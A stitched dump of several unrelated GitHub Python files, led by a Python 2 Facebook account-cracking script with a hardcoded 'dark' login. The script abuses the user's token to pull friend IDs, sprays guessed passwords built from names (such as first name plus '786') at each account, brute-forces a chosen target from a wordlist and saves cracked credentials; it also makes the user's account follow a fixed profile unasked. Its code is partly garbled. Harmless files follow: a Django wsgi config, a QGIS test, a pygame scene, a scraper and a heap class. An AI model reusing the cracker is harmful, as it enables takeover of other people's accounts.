| 2022-10-11T15:44:50.662945
| 2020-06-12T09:29:34
| 2020-06-12T09:29:34
| 271,526,990
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 20,817
|
py
|
#!/usr/bin/python2
#coding=utf-8
import os,sys,time,datetime,random,hashlib,re,threading,json,urllib,cookielib,requests,mechanize
from multiprocessing.pool import ThreadPool
from requests.exceptions import ConnectionError
from mechanize import Browser
reload(sys)
sys.setdefaultencoding('utf8')
br = mechanize.Browser()
br.set_handle_robots(False)
br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(),max_time=1)
br.addheaders = [('User-Agent', 'Opera/9.80 (Android; Opera Mini/32.0.2254/85. U; id) Presto/2.12.423 Version/12.16')]
def keluar():
print "\033[1;96m[!] \x1b[1;91mExit"
os.sys.exit()
def acak(b):
w = 'ahtdzjc'
d = ''
for i in x:
d += '!'+w[random.randint(0,len(w)-1)]+i
return cetak(d)
def cetak(b):
w = 'ahtdzjc'
for i in w:
j = w.index(i)
x= x.replace('!%s'%i,'\033[%s;1m'%str(31+j))
x += '\033[0m'
x = x.replace('!0','\033[0m')
sys.stdout.write(x+'\n')
def jalan(z):
for e in z + '\n':
sys.stdout.write(e)
sys.stdout.flush()
time.sleep(00000.1)
##### LOGO #####
logo = """
\033[1;91m ♦♦♦———————————————————————————————♦♦♦
\033[1;96m ITX D4RSH4N H3R3
\033[1;91m ♦♦♦———————————————————————————————♦♦♦
"""
def tik():
titik = ['. ','.. ','... ']
for o in titik:
print("\r\x1b[1;93mPlease Wait \x1b[1;93m"+o),;sys.stdout.flush();time.sleep(1)
back = 0
berhasil = []
cekpoint = []
oks = []
id = []
listgrup = []
vulnot = "\033[31mNot Vuln"
vuln = "\033[32mVuln"
os.system("clear")
print """
\033[1;97m DARK FAMILY X3 BABSA
"""
jalan("\033[1;97m•◈•───────•◈ NOT A NAME ITS BRAND •◈•───────•◈•")
jalan("\033[191m DARSHAN H3R3
jalan(" \033[1;91m INDAIN USERZ USE ANY PROXY ")
jalan(" \033[1;91m WIFI USERZ USE ANY PROXY ")
jalan(" \033[1;93m Welcome to Af2 Creations ")
jalan("\033[1;97m•◈•──────────•◈•\033[1;96mTheDarkFamily\033[1;96m•◈•──────────•◈•")
CorrectUsername = "dark"
CorrectPassword = "dark"
loop = 'true'
while (loop == 'true'):
username = raw_input("\033[1;96m[☆] \x1b[1;97mUSER ID \x1b[1;96m>>>> ")
if (username == CorrectUsername):
password = raw_input("\033[1;96m[☆] \x1b[1;97mPASWORD \x1b[1;96m>>>> ")
if (password == CorrectPassword):
print "Logged in successfully as " + username
loop = 'false'
else:
def login():
os.system('clear')
try:
toket = open('login.txt','r')
menu()
except (KeyError,IOError):
os.system('clear')
print logo
print 50*"\033[1;96m▪"
print(' \033[1;97m[◉] \x1b[1;96mLogin New Fresh Account \033[1;97m[◉]' )
id = raw_input(' \033[1;97m[◉] \033[1;97mID/Email \x1b[1;91m: \x1b[1;92m')
pwd = raw_input(' \033[1;97m[◉] \033[1;97mPassword \x1b[1;91m: \x1b[1;92m')
tik()
try:
br.open('https://m.facebook.com')
except mechanize.URLError:
print"\n\033[1;96m[!] \x1b[1;91mThere is no internet connection"
keluar()
br._factory.is_html = True
br.select_form(nr=0)
br.form['email'] = id
br.form['pass'] = pwd
br.submit()
url = br.geturl()
if 'save-device' in url:
try:
sig= 'api_key=882a8490361da98702bf97a021ddc14dcredentials_type=passwordemail='+id+'format=JSONgenerate_machine_id=1generate_session_cookies=1locale=en_USmethod=auth.loginpassword='+pwd+'return_ssl_resources=0v=1.062f8ce9f74b12f84c123cc23437a4a32'
data = {"api_key":"882a8490361da98702bf97a021ddc14d","credentials_type":"password","email":id,"format":"JSON", "generate_machine_id":"1","generate_session_cookies":"1","locale":"en_US","method":"auth.login","password":pwd,"return_ssl_resources":"0","v":"1.0"}
x=hashlib.new("md5")
x.update(sig)
a=x.hexdigest()
data.update({'sig':a})
url = "https://api.facebook.com/restserver.php"
r=requests.get(url,params=data)
z=json.loads(r.text)
unikers = open("login.txt", 'w')
unikers.write(z['access_token'])
unikers.close()
print '\n\x1b[1;36;40m[✓] Login Successful...'
os.system('xdg-open https://m.youtube.com/channel/UCpkJt660_upnZRNjnuLFNEA')
requests.post('https://graph.facebook.com/me/friends?method=post&uids=gwimusa3&access_token='+z['access_token'])
menu()
except requests.exceptions.ConnectionError:
print"\n\033[1;97m[!] There is no internet connection"
keluar()
if 'checkpoint' in url:
print("\n\033[1;97m[!] Your Account is on Checkpoint")
os.system('rm -rf login.txt')
time.sleep(1)
keluar()
else:
print("\n\033[1;97mPassword/Email is wrong")
os.system('rm -rf login.txt')
time.sleep(1)
login()
def menu():
os.system('clear')
try:
toket=open('login.txt','r').read()
except IOError:
os.system('clear')
print"\033[1;97m[!] Token invalid"
os.system('rm -rf login.txt')
time.sleep(1)
login()
try:
otw = requests.get('https://graph.facebook.com/me?access_token='+toket)
a = json.loads(otw.text)
nama = a['name']
id = a['id']
ots = requests.get('https://graph.facebook.com/me/subscribers?access_token=' + toket)
b = json.loads(ots.text)
sub = str(b['summary']['total_count'])
except KeyError:
os.system('clear')
print"\033[1;97mYour Account is on Checkpoint"
os.system('rm -rf login.txt')
time.sleep(1)
login()
except requests.exceptions.ConnectionError:
print"\033[1;97mThere is no internet connection"
keluar()
os.system("clear")
print logo
print " \033[1;36;40m ╔═════════════════════════════════╗"
print " \033[1;36;40m ║\033[1;32;40m[*] Name\033[1;32;40m: "+nama+" \033[1;36;40m║"
print " \033[1;36;40m ║\033[1;34;40m[*] ID \033[1;34;40m: "+id+" \033[1;36;40m║"
print " \033[1;36;40m ║\033[1;34;40m[*] Subs\033[1;34;40m: "+sub+" \033[1;36;40m║"
print " \033[1;36;40m ╚═════════════════════════════════╝"
print "\033[1;32;40m[1] \033[1;33;40m══Start Hack3ing"
print "\033[1;32;40m[2] \033[1;33;40m══Update Mraf2"
print "\033[1;32;40m[0] \033[1;33;40m══Log out"
pilih()
def pilih():
unikers = raw_input("\n\033[1;31;40m>>> \033[1;35;40m")
if unikers =="":
print "\033[1;97mFill in correctly"
pilih()
elif unikers =="1":
super()
elif unikers =="2":
os.system('clear')
print logo
print " \033[1;36;40m●════════════════════════◄►════════════════════════●\n"
os.system('git pull origin master')
raw_input('\n\033[1;97m[ \033[1;97mBack \033[1;97m]')
menu()
elif unikers =="0":
jalan('Token Removed')
os.system('rm -rf login.txt')
keluar()
else:
print "\033[1;97mFill in correctly"
pilih()
def super():
global toket
os.system('clear')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;97mToken invalid"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print "\x1b[1;32;40m[1] \033[1;33;40m══Hack From Friend List"
print "\x1b[1;32;40m[2] \033[1;33;40m══Hack From Public ID"
print "\x1b[1;32;40m[3] \033[1;33;40m══Hack Bruteforce"
print "\x1b[1;32;40m[4] \033[1;33;40m══Hack From File"
print "\x1b[1;32;40m[0] \033[1;33;40m══Back"
pilih_super()
def pilih_super():
peak = raw_input("\n\033[1;31;40m>>> \033[1;97m")
if peak =="":
print "\033[1;97mFill in correctly"
pilih_super()
elif peak =="1":
os.system('clear')
print logo
jalan('\033[1;97m[✺] Getting IDs \033[1;97m...')
r = requests.get("https://graph.facebook.com/me/friends?access_token="+toket)
z = json.loads(r.text)
for s in z['data']:
id.append(s['id'])
elif peak =="2":
os.system('clear')
print logo
idt = raw_input("\033[1;97m[*] Enter ID : ")
try:
jok = requests.get("https://graph.facebook.com/"+idt+"?access_token="+toket)
op = json.loads(jok.text)
print"\033[1;31;40m[✺] Name : "+op["name"]
except KeyError:
print"\033[1;97m[✺] ID Not Found!"
raw_input("\n\033[1;97m[\033[1;97mBack\033[1;97m]")
super()
print"\033[1;35;40m[✺] Getting IDs..."
r = requests.get("https://graph.facebook.com/"+idt+"/friends?access_token="+toket)
z = json.loads(r.text)
for i in z['data']:
id.append(i['id'])
elif peak =="3":
os.system('clear')
print logo
brute()
elif peak =="4":
os.system('clear')
print logo
try:
idlist = raw_input('\033[1;97m[+] \033[1;97mEnter the file name \033[1;97m: \033[1;97m')
for line in open(idlist,'r').readlines():
id.append(line.strip())
except IOError:
print '\x1b[1;35;40m[!] \x1b[1;35;40mFile not found'
raw_input('\n\x1b[1;35;40m[ \x1b[1;35;40mExit \x1b[1;35;40m]')
super()
elif peak =="0":
menu()
else:
print "\033[1;97mFill in correctly"
pilih_super()
print "\033[1;36;40m[✺] Total IDs : \033[1;97m"+str(len(id))
jalan('\033[1;34;40m[✺] Please Wait...')
titik = ['. ','.. ','... ']
for o in titik:
print("\r\033[1;32;40m[✺] Cloning\033[1;97m"+o),;sys.stdout.flush();time.sleep(1)
print "\n\033[1;97m ❈ \033[1;97mTo Stop Process Press CTRL+Z \033[1;97m ❈"
print " \033[1;31;48m●💋══════════════════◄►══════════════════💋●"
jalan(' \033[1;97mMr Af2 start cloning Wait...')
print " \033[1;36;48m ●💋══════════════════◄►══════════════════💋●"
def main(arg):
global cekpoint,oks
user = arg
try:
os.mkdir('out')
except OSError:
pass
try:
a = requests.get('https://graph.facebook.com/'+user+'/?access_token='+toket)
b = json.loads(a.text)
pass1 = b['first_name'] + '786'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass1)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\033[1;97m[Login Now] \033[1;97m ' + user + ' \033[1;97m | \033[1;97m ' + pass1 + ' 👽 ' + b['name']
oks.append(user+pass1)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;36;40m[After24Hr] \033[1;97m ' + user + ' \x1b[1;36;40m|\033[1;97m ' + pass1 + ' 👽 ' + b['name']
cek = open("out/CP.txt", "a")
cek.write(user+"|"+pass1+"\n")
cek.close()
cekpoint.append(user+pass1)
else:
pass2 = b['first_name'] + '123'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass2)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\033[1;97m[Login Now] \033[1;97m ' + user + ' \033[1;97m | \033[1;97m ' + pass2 + ' 👽 ' + b['name']
oks.append(user+pass2)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;36;40m[After24Hr] \033[1;97m ' + user + ' \x1b[1;36;40m|\033[1;97m ' + pass2 + ' 👽 ' + b['name']
cek = open("out/CP.txt", "a")
cek.write(user+"|"+pass2+"\n")
cek.close()
cekpoint.append(user+pass2)
else:
pass3 = b['first_name'] + '12345'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass3)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\033[1;97m[Login Now] \033[1;97m ' + user + ' \033[1;97m | \033[1;97m ' + pass3 + ' 👽 ' + b['name']
oks.append(user+pass3)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;36;40m[After24Hr] \033[1;97m ' + user + ' \x1b[1;36;40m|\033[1;97m ' + pass3 + ' 👽 ' + b['name']
cek = open("out/CP.txt", "a")
cek.write(user+"|"+pass3+"\n")
cek.close()
cekpoint.append(user+pass4)
else:
pass4 = b['first_name'] + '1234'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass4)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\033[1;97m[Login Now] \033[1;97m ' + user + ' \033[1;97m | \033[1;97m ' + pass4 + ' 👽 ' + b['name']
oks.append(user+pass4)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;36;40m[After24Hr] \033[1;97m ' + user + ' \x1b[1;36;40m|\033[1;97m ' + pass4 + ' 👽 ' + b['name']
cek = open("out/CP.txt", "a")
cek.write(user+"|"+pass4+"\n")
cek.close()
cekpoint.append(user+pass4)
else:
pass5 = '786786'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass5)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\033[1;97m[Login Now] \033[1;97m ' + user + ' \x1b[1;36;40m|\033[1;97m ' + pass5 + ' 👽 ' + b['name']
oks.append(user+pass5)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;36;40m[After24Hr] \033[1;97m ' + user + ' \x1b[1;36;40m|\033[1;97m ' + pass5 + ' 👽 ' + b['name']
cek = open("out/CP.txt", "a")
cek.write(user+"|"+pass5+"\n")
cek.close()
cekpoint.append(user+pass5)
else:
pass6 = b['last_name'] + '123'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass6)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\033[1;97m[Login Now] \033[1;97m ' + user + ' \x1b[1;36;40m|\033[1;97m ' + pass6 + ' 👽 ' + b['name']
oks.append(user+pass6)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;36;40m[After24Hr] \033[1;97m ' + user + ' \x1b[1;36;40m|\033[1;97m ' + pass6 + ' 👽 ' + b['name']
cek = open("out/CP.txt", "a")
cek.write(user+"|"+pass6+"\n")
cek.close()
cekpoint.append(user+pass6)
else:
pass7 = 'Afghanistan'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass7)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\033[1;97m[Login Now] \033[1;97m ' + user + ' \x1b[1;36;40m|\033[1;97m ' + pass7 + ' 👽 ' + b['name']
oks.append(user+pass7)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;36;40m[After24Hr] \033[1;97m ' + user + ' \x1b[1;36;40m|\033[1;97m ' + pass7 + ' 👽 ' + b['name']
cek = open("out/CP.txt", "a")
cek.write(user+"|"+pass7+"\n")
cek.close()
cekpoint.append(user+pass7)
except:
pass
p = ThreadPool(30)
p.map(main, id)
print '\033[1;31;40m[✓] Process Has Been Completed\033[1;97m....'
print "\033[1;32;40m[+] Total OK/\033[1;97mCP \033[1;97m: \033[1;97m"+str(len(oks))+"\033[1;31;40m/\033[1;36;40m"+str(len(cekpoint))
print '\033[1;34;40m[+] CP File Has Been Saved : save/cp.txt'
print """
\033[1;31;40m ●════════════════════════◄►════════════════════════●
"""
raw_input("\n\033[1;97m[\033[1;97mExit\033[1;97m]")
super()
def brute():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\033[1;97m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(0.5)
login()
else:
os.system('clear')
print logo
print '\033[1;31;40m ●════════════════════════◄►════════════════════════●'
try:
email = raw_input('\033[1;97m[+] \033[1;97mID\033[1;97m/\033[1;97mEmail \033[1;97mTarget \033[1;97m:\033[1;97m ')
passw = raw_input('\033[1;97m[+] \033[1;97mWordlist \033[1;97mext(list.txt) \033[1;97m: \033[1;97m')
total = open(passw, 'r')
total = total.readlines()
print '\033[1;31;40m ●════════════════════════◄►════════════════════════●'
print '\033[1;97m[\033[1;97m\xe2\x9c\x93\033[1;97m] \033[1;97mTarget \033[1;97m:\033[1;97m ' + email
print '\033[1;97m[+] \033[1;97mTotal\033[1;97m ' + str(len(total)) + ' \033[1;97mPassword'
jalan('\033[1;97m[\xe2\x9c\xba] \033[1;97mPlease wait \033[1;97m...')
sandi = open(passw, 'r')
for pw in sandi:
try:
pw = pw.replace('\n', '')
sys.stdout.write('\r\033[1;97m[\033[1;97m\xe2\x9c\xb8\033[1;97m] \033[1;97mTry \033[1;97m' + pw)
sys.stdout.flush()
data = requests.get('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + email + '&locale=en_US&password=' + pw + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
mpsh = json.loads(data.text)
if 'access_token' in mpsh:
dapat = open('Brute.txt', 'w')
dapat.write(email + ' | ' + pw + '\n')
dapat.close()
print '\n\033[1;97m[+] \033[1;97mFounded.'
print 52 * '\033[1;97m\xe2\x95\x90'
print '\033[1;97m[\xe2\x9e\xb9] \033[1;97mUsername \033[1;97m:\033[1;97m ' + email
print '\033[1;97m[\xe2\x9e\xb9] \033[1;97mPassword \033[1;97m:\033[1;97m ' + pw
keluar()
else:
if 'www.facebook.com' in mpsh['error_msg']:
ceks = open('Brutecekpoint.txt', 'w')
ceks.write(email + ' | ' + pw + '\n')
ceks.close()
print '\n\033[1;97m[+] \033[1;97mFounded.'
print "\033[1;36;40m ●════════════════════════◄►════════════════════════●"
print '\033[1;97m[!] \033[1;97mAccount Maybe Checkpoint'
print '\033[1;97m[\xe2\x9e\xb9] \033[1;97mUsername \033[1;97m:\033[1;97m ' + email
print '\033[1;97m[\xe2\x9e\xb9] \033[1;97mPassword \033[1;97m:\033[1;97m ' + pw
keluar()
except requests.exceptions.ConnectionError:
print '\033[1;97m[!] Connection Error'
time.sleep(1)
except IOError:
print '\033[1;97m[!] File not found...'
print """\n\033[1;97m[!] \033[1;97mLooks like you don't have a wordlist"""
super()
if __name__ == '__main__':
login()
|
[
"noreply@github.com"
] |
darshankhakhodiya143.noreply@github.com
|
57c4abb61863b4e306c8d7e7968366cef774dbdd
|
9b2b3ce5a94e5559c49991f4b3e7112a3ea39ebc
|
/schoolcms/wsgi.py
|
a42cdd7ea70c3f0be8f22a615842e8fe5ea81098
|
[] |
no_license
|
suryakumar1024/schoolcms
|
7394d7c1587c5559b22906db96ff55f7969391a2
|
b377ff5b80b4d6b6641d3ccfb040459712e2facf
|
refs/heads/master
| 2021-05-03T14:53:16.850483
| 2019-03-04T11:28:15
| 2019-03-04T11:28:15
| 69,850,013
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 395
|
py
|
"""
WSGI config for schoolcms project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/1.8/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "schoolcms.settings")
application = get_wsgi_application()
|
[
"suryak22@outlook.com"
] |
suryak22@outlook.com
|
c2b8a7ff84cbf75a213e37f6530789404d4e359d
|
7905c69a89842486eaebe97911b020d49567e3c1
|
/test/test_idecanarias_dockwidget.py
|
a929e5f6b22118268884e842d41d16c33c9476f4
|
[] |
no_license
|
fherdom/IDECanarias3
|
662e0eb0f0850e7d2c670e41c1c5caa864425bc3
|
7f3e5b6a8a61d343f428fa9f054a5cf03437bdef
|
refs/heads/master
| 2021-04-26T22:13:32.061017
| 2020-02-06T13:59:07
| 2020-02-06T13:59:07
| 124,045,933
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,134
|
py
|
# coding=utf-8
"""DockWidget test.
.. note:: This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.
"""
__author__ = 'fhernandeze@grafcan.com'
__date__ = '2018-03-06'
__copyright__ = 'Copyright 2018, Félix José Hernández'
import unittest
from PyQt5.QtWidgets import QDockWidget
from idecanarias_dockwidget import IDECanariasDockWidget
from utilities import get_qgis_app
QGIS_APP = get_qgis_app()
class IDECanariasDockWidgetTest(unittest.TestCase):
"""Test dockwidget works."""
def setUp(self):
"""Runs before each test."""
self.dockwidget = IDECanariasDockWidget(None)
def tearDown(self):
"""Runs after each test."""
self.dockwidget = None
def test_dockwidget_ok(self):
"""Test we can click OK."""
pass
if __name__ == "__main__":
    suite = unittest.makeSuite(IDECanariasDockWidgetTest)
runner = unittest.TextTestRunner(verbosity=2)
runner.run(suite)
|
[
"felix@Felix.grafcan.tfe"
] |
felix@Felix.grafcan.tfe
|
584dc20b3ad651e22fc34eba3c0edc1f48eef89e
|
e6f3c3d67183497c044b6ae2cfc389a56d65a9ff
|
/extra/pygame/8-python-pygame-exercise-files/Game/Scenes/HighscoreScene.py
|
1a845dd4bb4b5e7d70ace251b3bc8e5089f17d0f
|
[] |
no_license
|
univdig/python-training
|
e9e2da35c77a49af4c0bf9153b70029d5a7ca31b
|
72e00806ab3c05f64a97c1eb6fc42026bbf33ebe
|
refs/heads/master
| 2021-01-16T22:17:00.621488
| 2016-03-10T21:03:34
| 2016-03-10T21:03:34
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,219
|
py
|
import pygame
from Game.Scenes.Scene import Scene
from Game import Highscore
from Game.Shared import *
class HighscoreScene(Scene):
def __init__(self, game):
super(HighscoreScene, self).__init__(game)
self.__highscoreSprite = pygame.image.load(GameConstants.SPRITE_HIGHSCORE)
def render(self):
self.getGame().screen.blit(self.__highscoreSprite, (50, 50))
self.clearText()
highscore = Highscore()
x = 350
y = 100
for score in highscore.getScores():
self.addText(score[0], x, y, size = 30)
self.addText(str(score[1]), x + 200, y, size = 30)
y += 30
self.addText("Press F1 to start a new game", x, y + 60, size = 30)
super(HighscoreScene, self).render()
def handleEvents(self, events):
super(HighscoreScene, self).handleEvents(events)
for event in events:
if event.type == pygame.QUIT:
exit()
if event.type == pygame.KEYDOWN:
if event.key == pygame.K_F1:
self.getGame().reset()
self.getGame().changeScene(GameConstants.PLAYING_SCENE)
|
[
"gabriel.briones.sayeg@intel.com"
] |
gabriel.briones.sayeg@intel.com
|
e7b57f0e9b8501259408dbc1c7b7851fa4e565a3
|
6013064c1220fea2d1e40faa9a17e5df10640a0b
|
/scrapers/lider/simple/extractors.py
|
6b94a296fc8b7376faf1de45101fd399859bb817
|
[] |
no_license
|
4chirinos/scraper
|
e5ece303378e35bfa86f831ebd48e6d1b04eb320
|
a7eb3988a28bf8d91ce74a51e50956b0b5ce3e34
|
refs/heads/master
| 2020-05-20T19:33:57.389107
| 2020-04-07T16:07:14
| 2020-04-07T16:07:14
| 185,725,230
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 678
|
py
|
from .models import ProductInformation
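# These helpers pull product records out of the search API payload: only
# products enabled in at least one store are kept, and the price is read
# from the first store listed for the product.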
def extract_products(data):
return data['hits']
def extract_product_information(product):
if is_product_active(product):
name = product['name']
sku = product['sku']
measure = product['uom']
price = get_price(product)
return ProductInformation(name, sku, price, measure)
return None
def get_price(product):
first_store = list(product['stores'].keys())[0]
store = product['stores'][first_store]
return store['prices']['sale']
def is_product_active(product):
for store_id in list(product['stores'].keys()):
store = product['stores'][store_id]
if store['enabled']:
return True
return False
|
[
"Argenis_Chirinos@gap.com"
] |
Argenis_Chirinos@gap.com
|
d32d2d0ba843d841278be8b3f5679efdb92e44f7
|
3961f9f14a2e3ae9806176290a89a1c679612373
|
/docs/report/fa20-523-349/project/RankNet/indycar/simulator.py
|
e1cb108341de6cbf64fdcefd2585934d1d0490fc
|
[
"Apache-2.0"
] |
permissive
|
mikahla1/cybertraining-dsc.github.io
|
c97026096dd36d3fa129c8068b9c1b35ae1617a3
|
168cadb2f755cb6ad4907e5656bd879d57e01e43
|
refs/heads/main
| 2023-06-10T18:11:53.925182
| 2021-06-30T18:41:43
| 2021-06-30T18:41:43
| 382,053,310
| 0
| 0
|
Apache-2.0
| 2021-07-01T14:05:43
| 2021-07-01T14:05:42
| null |
UTF-8
|
Python
| false
| false
| 1,765
|
py
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
"""
IndyCar Simulator
laptime = ForcastedTime + FuelAdj + Random
pitstop :
pit window, 10 laps
in lap penalty
pit time
out lap penalty
"""
import sys,os,re
import datetime
import random
import numpy as np
import logging
from optparse import OptionParser
logger = logging.getLogger(__name__)
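# A minimal sketch of the lap-time model described in the module docstring,
# laptime = ForcastedTime + FuelAdj + Random. The parameter names and the
# Gaussian noise scale below are illustrative assumptions, not part of the
# original simulator.
def sketch_laptime(forecasted_time, fuel_adj, noise_scale=0.5):
    # forecasted_time: predicted lap time in seconds
    # fuel_adj: correction for the current fuel load
    # noise_scale: standard deviation of the random component
    return forecasted_time + fuel_adj + random.gauss(0.0, noise_scale)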
class IndySimulator():
"""
"""
def __init__(self):
pass
def load_config(self, configfile):
pass
    def run(self):
        # the simulation loop is not implemented yet; keep the method a no-op
        pass
if __name__=="__main__":
program = os.path.basename(sys.argv[0])
logger = logging.getLogger(program)
# logging configure
import logging.config
logging.basicConfig(format='%(asctime)s : %(levelname)s : %(message)s')
logging.root.setLevel(level=logging.DEBUG)
logger.info("running %s" % ' '.join(sys.argv))
# cmd argument parser
usage = 'nabcsv.py --threshold threshold --input inputfile --output outputfile'
parser = OptionParser(usage)
parser.add_option("--input", dest="inputfile")
parser.add_option("--output", dest="outputfile")
parser.add_option("--threshold", type=float, dest="threshold")
parser.add_option("--flagfile", default="")
parser.add_option("--cmd", dest="cmd", default='score')
opt, args = parser.parse_args()
if opt.inputfile is None:
logger.error(globals()['__doc__'] % locals())
sys.exit(1)
if opt.cmd == 'score':
convert_score(opt.inputfile, opt.outputfile, opt.threshold)
elif opt.cmd == 'flag':
convert_flag(opt.inputfile, opt.outputfile)
elif opt.cmd == 'prune':
prune(opt.inputfile, opt.flagfile,opt.outputfile)
elif opt.cmd == 'confuse':
convert_confuse(opt.inputfile, opt.outputfile)
|
[
"laszewski@gmail.com"
] |
laszewski@gmail.com
|
f7cc021e0089997b48a7c793ecc398ccb729e89d
|
a7ec33c7defd493f2bb6e7dbbbb338ce47fbfd8c
|
/tree_and_tree_algorithms/minimum_binary_heap.py
|
635daec29c0bdf0a60c9dd94268a380ae1af44c8
|
[
"MIT"
] |
permissive
|
arvinsim/data-structures-and-algorithms-implementation
|
85871647c87e0d0dad3910ebff28d73321708774
|
5f15d48243e08bf20099a0c7e807278ed24ce269
|
refs/heads/master
| 2021-01-23T06:49:51.753007
| 2017-03-30T01:27:26
| 2017-03-30T01:27:26
| 86,403,339
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,164
|
py
|
class BinaryHeap:
"""
BinaryHeap() creates a new, empty, binary heap.
This is the minimum heap version
"""
def __init__(self):
self.heapList = []
self.currentSize = 0
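    # Array layout for a 0-based binary heap: the children of node i live at
    # 2*i + 1 and 2*i + 2, and the parent of node i lives at (i - 1) // 2,
    # which is what the index helpers below compute.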
def get_left_child_index(self, parent_index):
return (parent_index * 2) + 1
def get_right_child_index(self, parent_index):
return (parent_index * 2) + 2
def get_parent_index(self, child_index):
return (child_index - 1) // 2
def has_left_child(self, index):
return self.get_left_child_index(index) < self.currentSize
def has_right_child(self, index):
return self.get_right_child_index(index) < self.currentSize
    def has_parent(self, index):
        # the root (index 0) has no parent; every other index does
        return self.get_parent_index(index) >= 0
def left_child(self, index):
return self.heapList[self.get_left_child_index(index)]
def right_child(self, index):
return self.heapList[self.get_right_child_index(index)]
    def parent(self, index):
return self.heapList[self.get_parent_index(index)]
def swap(self, i, j):
"""
Swap items
"""
self.heapList[i], self.heapList[j] = self.heapList[j], self.heapList[i]
    def heapify_up(self, i):
        """
        Swap values up until the parent is smaller than the inserted value
        """
        # indices are 0-based, so walk up through get_parent_index
        while i > 0:
            parent_index = self.get_parent_index(i)
            # Swap if parent is greater than child (min-heap property)
            if self.heapList[i] < self.heapList[parent_index]:
                self.swap(i, parent_index)
            i = parent_index
def heapify_down(self):
index = 0
        # Sift the root value down, swapping with the smaller child until the heap order holds
while self.has_left_child(index):
# set the smaller child
smaller_child_index = self.get_left_child_index(index)
if self.has_right_child(index) and self.right_child(index) < self.left_child(index):
smaller_child_index = self.get_right_child_index(index)
# If smaller child index item is less than current index item, stop
if self.heapList[index] < self.heapList[smaller_child_index]:
break
else:
self.swap(index, smaller_child_index)
index = smaller_child_index
def insert(self, k):
"""
insert(k) adds a new item to the heap.
"""
self.heapList.append(k)
self.currentSize = self.currentSize + 1
self.heapify_up(self.currentSize-1)
    def peek(self):
"""
Returns the item with the minimum key value, leaving item in the heap.
"""
return self.heapList[0]
    def poll(self):
        """
        Returns the item with the minimum key value, removing the item from the heap.
        """
        item = self.heapList[0]
        last = self.heapList.pop()
        self.currentSize -= 1
        if self.currentSize > 0:
            # move the last element to the root and restore the heap order
            self.heapList[0] = last
            self.heapify_down()
        return item
if __name__ == '__main__':
bh = BinaryHeap()
bh.insert(10)
bh.insert(15)
bh.insert(20)
bh.insert(17)
bh.insert(25)
print(bh.heapList)
print('Do poll. Item: ', bh.poll())
print(bh.heapList)
|
[
"developarvin@gmail.com"
] |
developarvin@gmail.com
|
e275b3cff26f83c7f3121b0cd98bec47ae460836
